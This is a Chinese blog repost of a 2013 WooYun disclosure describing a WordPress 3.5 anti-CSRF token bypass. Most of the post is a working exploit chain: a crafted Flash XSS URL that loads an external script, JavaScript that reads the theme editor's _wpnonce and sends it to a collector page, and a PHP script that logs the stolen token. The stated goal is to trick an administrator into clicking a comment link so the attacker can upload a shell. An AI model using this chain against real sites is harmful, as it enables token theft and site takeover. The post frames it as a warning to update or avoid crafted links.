wordpress anti-csrf token bypass漏洞

作者: 大海 分类: 安全 发布时间: 2013-06-10 22:53 ė113,210 views 62条评论

这是一篇来自乌云的文章,貌似会对wordpress的安全造成一定影响,对网络安全方面的东西不懂,但是从漏洞描述来看要么更新wordpress到最新版本,要么不要点击评论中的超链接。下面是原文:

披露状态:

2013-04-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

wordpress 后台修改模版 anti-csrf token可以bypass。真的可以结合社工拿shell了。童叟无欺。影响版本 3.5及一下版本,3.5.1则不存在这个漏洞。

详细说明:

wordpress 3.5及一下版本有个FLASH XSS.详情见 WooYun: Flash应用安全系列[3]–WordPress反射型跨站(0day)

想骗取管理员点击你的链接 CSRF 添加个SHELL,可以是有个anti-csrf token.

但可以用这个XSS盗取anti-csrf token.进而顺利CSRF,拿shell。

假设我们要盗取的是修改404模版的token.

结合社工在评论下面添加下面的链接

http://localhost/wp/wp-includes/js/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{if%28!window.x%29{window.x=1;document.write(‘<script src=http://localhost/1.js></script>’);}}//

1.js 内容为

x=window.open('http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve');
setTimeout("fuck(x)",5000);
function fuck(x) {
var a=x.document.getElementById('_wpnonce').value;
alert(a);
location.href='http://localhost/cookie.php?c='+a;
}

本地cookie.php内容为

<?php
fputs(fopen("cookie.txt","w"),$_GET

); ?>

管理员点击后。。。即可在COOKIE.TXT中看到你想要的,你值得拥有

2611305555bc009a1c57e3197edb9272c50dc071
说下 这个TOKEN是一直不会变的 除非重新安装WP。

原文地址

 

本文出自 纳百川,转载时请注明出处及相应链接。

本文永久链接: https://www.bicner.com/198.html

2条评论

  1. 鲜活优惠码 2013/06/10 23:12

    我就是点击评论到这里来的

    1. 大海 2013/06/11 13:00

      不是所有的评论都不能点,是经过特意构造的超链接。

Ɣ回顶部